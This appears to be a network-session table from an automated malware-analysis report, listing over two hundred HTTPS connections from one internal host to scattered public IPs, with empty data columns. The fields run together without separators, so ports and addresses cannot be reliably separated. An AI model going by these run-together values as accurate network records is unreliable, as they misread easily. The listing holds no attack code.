                                            20287192.168.2.1539578165.80.102.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20288192.168.2.154994065.242.222.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20289192.168.2.1535414136.47.26.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20290192.168.2.153875490.178.125.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20291192.168.2.154803895.154.20.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20292192.168.2.1541856156.61.30.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20293192.168.2.154261495.39.226.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20294192.168.2.1535082210.241.240.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20295192.168.2.153960694.103.184.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20296192.168.2.1557942165.182.58.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20297192.168.2.1554600219.115.171.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20298192.168.2.154337052.197.109.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20299192.168.2.15562785.48.253.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20300192.168.2.1542414125.220.17.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20301192.168.2.154233490.187.238.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20302192.168.2.1549192120.41.123.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20303192.168.2.1547484199.221.111.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20304192.168.2.1545700144.218.80.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20305192.168.2.1558742125.187.164.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20306192.168.2.1552084211.152.103.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20307192.168.2.155362879.97.32.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20308192.168.2.1540276119.180.126.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20309192.168.2.1560406117.235.80.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20310192.168.2.1560498137.59.28.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20311192.168.2.1533516153.36.12.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20312192.168.2.1538232186.119.229.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20313192.168.2.1547158154.181.76.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20314192.168.2.156088465.81.242.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20315192.168.2.1550884123.53.197.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20316192.168.2.155055273.104.71.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20317192.168.2.1538536206.82.138.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20318192.168.2.15388784.66.6.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20319192.168.2.1541686199.137.22.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20320192.168.2.1554064165.44.102.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20321192.168.2.1548888171.210.214.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20322192.168.2.154463445.175.7.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20323192.168.2.1559086174.65.196.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20324192.168.2.1549638144.162.19.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20325192.168.2.1536022223.23.147.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20326192.168.2.1557350113.59.5.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20327192.168.2.1551368212.73.59.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20328192.168.2.155669495.165.126.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20329192.168.2.1534968201.118.161.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20330192.168.2.1542986180.99.67.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20331192.168.2.1544784184.177.147.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20332192.168.2.1549498210.182.116.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20333192.168.2.153514818.136.20.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20334192.168.2.1536096187.159.228.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20335192.168.2.1539520114.192.66.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20336192.168.2.15512902.98.79.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20337192.168.2.155546493.136.124.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20338192.168.2.1548168163.165.113.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20339192.168.2.1545914133.57.205.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20340192.168.2.1551986104.217.166.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20341192.168.2.1538184130.115.98.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20342192.168.2.1538460128.132.229.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20343192.168.2.1536648137.177.58.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20344192.168.2.1544874158.103.68.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20345192.168.2.1550036180.171.83.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20346192.168.2.1555994174.51.45.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20347192.168.2.1551950201.212.42.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20348192.168.2.153440472.38.246.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20349192.168.2.154229692.220.100.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20350192.168.2.1540186217.5.221.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20351192.168.2.153785451.27.17.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20352192.168.2.1552530175.69.103.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20353192.168.2.15391148.71.159.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20354192.168.2.153548075.23.7.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20355192.168.2.153320249.35.95.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20356192.168.2.155406875.117.169.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20357192.168.2.1547158217.44.0.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20358192.168.2.153424466.59.208.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20359192.168.2.1553094165.103.197.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20360192.168.2.1544980106.75.87.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20361192.168.2.1532860146.63.1.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20362192.168.2.1544558210.6.203.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20363192.168.2.154874832.78.175.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20364192.168.2.155054497.199.81.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20365192.168.2.1537958126.110.223.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20366192.168.2.154265034.237.135.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20367192.168.2.1545460186.86.231.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20368192.168.2.154797440.138.40.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20369192.168.2.153379069.204.146.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20370192.168.2.1548032171.243.79.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20371192.168.2.155155243.170.118.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20372192.168.2.1550690192.239.171.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20373192.168.2.1538380207.34.45.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20374192.168.2.155935242.84.138.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20375192.168.2.1549758158.115.59.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20376192.168.2.155034446.171.180.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20377192.168.2.155815266.34.245.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20378192.168.2.15373128.84.162.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20379192.168.2.155685042.165.111.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20380192.168.2.1548218173.246.174.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20381192.168.2.1536324208.220.111.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20382192.168.2.154973290.118.51.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20383192.168.2.153457846.121.209.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20384192.168.2.1546140216.50.23.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20385192.168.2.1538006161.226.232.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20386192.168.2.1539092155.209.36.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20387192.168.2.1548688209.26.204.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20388192.168.2.1537000103.52.101.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20389192.168.2.1560726205.253.178.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20390192.168.2.154463273.164.145.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20391192.168.2.1541352135.135.213.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20392192.168.2.154776238.202.158.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20393192.168.2.1541928110.177.162.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20394192.168.2.1549486132.177.167.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20395192.168.2.1557540131.255.54.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20396192.168.2.1545794174.94.243.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20397192.168.2.1546834155.102.133.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20398192.168.2.1556426112.71.170.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20399192.168.2.1559078147.130.220.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20400192.168.2.1555120199.10.57.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20401192.168.2.154795479.89.18.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20402192.168.2.154911287.68.14.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20403192.168.2.1557554149.123.20.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20404192.168.2.1548552141.207.169.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20405192.168.2.1559434146.88.249.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20406192.168.2.1539358222.33.229.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20407192.168.2.1550124210.213.47.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20408192.168.2.1545344160.115.160.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20409192.168.2.154164863.95.68.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20410192.168.2.153857612.163.98.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20411192.168.2.1554544102.35.86.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20412192.168.2.1549238132.134.70.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20413192.168.2.1548124120.230.25.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20414192.168.2.1552394207.235.179.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20415192.168.2.155896657.246.53.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20416192.168.2.1559926117.103.222.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20417192.168.2.153977443.151.72.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20418192.168.2.1543826168.58.215.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20419192.168.2.1552446141.37.62.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20420192.168.2.1552482124.252.135.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20421192.168.2.1551060196.195.201.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20422192.168.2.154347431.75.168.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20423192.168.2.155640088.252.174.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20424192.168.2.154641097.152.112.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20425192.168.2.1556582120.186.195.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20426192.168.2.1558878128.183.15.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20427192.168.2.1553722185.111.197.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20428192.168.2.155849254.227.223.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20429192.168.2.154326439.134.120.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20430192.168.2.153496817.79.115.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20431192.168.2.155123432.217.35.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20432192.168.2.1555160143.131.222.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20433192.168.2.1547760172.147.27.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20434192.168.2.1542418110.62.99.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20435192.168.2.1537536133.103.139.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20436192.168.2.1544094165.55.245.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20437192.168.2.154654012.94.218.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20438192.168.2.155144283.13.226.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20439192.168.2.155468834.69.138.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20440192.168.2.154783078.86.250.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20441192.168.2.1555522118.244.67.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20442192.168.2.156085625.194.151.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20443192.168.2.156067479.218.163.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20444192.168.2.1557760219.197.122.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20445192.168.2.153328658.12.3.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20446192.168.2.155016671.154.207.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20447192.168.2.1541004102.218.204.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20448192.168.2.154798235.166.65.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20449192.168.2.154462040.137.197.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20450192.168.2.155112697.219.163.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20451192.168.2.1555174102.108.167.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20452192.168.2.1536404113.102.54.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20453192.168.2.1554056207.82.54.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20454192.168.2.155054066.111.43.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20455192.168.2.1540988210.188.94.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20456192.168.2.1559132189.242.162.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20457192.168.2.154858461.238.174.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20458192.168.2.1544068213.161.165.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20459192.168.2.1560280126.166.212.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20460192.168.2.1541802161.116.232.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20461192.168.2.1559366175.13.5.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20462192.168.2.1552474131.201.240.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20463192.168.2.1559242159.27.101.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20464192.168.2.1552438209.224.142.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20465192.168.2.1536202152.145.60.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20466192.168.2.1545062206.238.41.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20467192.168.2.155323220.7.197.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20468192.168.2.154480292.230.160.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20469192.168.2.1560282178.161.156.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20470192.168.2.1557152202.77.46.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20471192.168.2.1539842210.4.29.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20472192.168.2.1554830192.102.166.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20473192.168.2.1548530197.210.245.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20474192.168.2.154875499.23.18.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20475192.168.2.1546570141.175.198.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20476192.168.2.1542226137.75.228.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20477192.168.2.1534872162.14.7.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20478192.168.2.154873847.214.56.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20479192.168.2.1543028212.39.240.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20480192.168.2.1535004113.15.227.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20481192.168.2.155686459.58.206.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20482192.168.2.155113023.229.194.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20483192.168.2.1537194166.19.48.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20484192.168.2.1542546162.176.236.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20485192.168.2.1550470181.104.159.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20486192.168.2.1557848180.27.179.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20487192.168.2.1537188139.133.38.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20488192.168.2.1560632164.107.239.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20489192.168.2.155282246.60.108.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20490192.168.2.1542006163.212.205.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20491192.168.2.1552418164.56.135.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20492192.168.2.1541258140.249.50.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20493192.168.2.1553216187.217.113.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20494192.168.2.1543980205.106.240.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20495192.168.2.1545902195.108.116.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20496192.168.2.1533712120.204.1.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20497192.168.2.1543902192.114.111.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20498192.168.2.154409082.209.124.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20499192.168.2.154173268.223.189.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20500192.168.2.1546130177.110.129.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20501192.168.2.1549774118.81.195.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20502192.168.2.1545270125.151.101.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20503192.168.2.155315875.165.29.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20504192.168.2.1552046217.232.166.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20505192.168.2.1541936222.44.109.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20506192.168.2.1554824124.142.117.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20507192.168.2.153309284.41.85.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20508192.168.2.1540004115.192.204.59443
                                            TimestampBytes transferredDirectionData


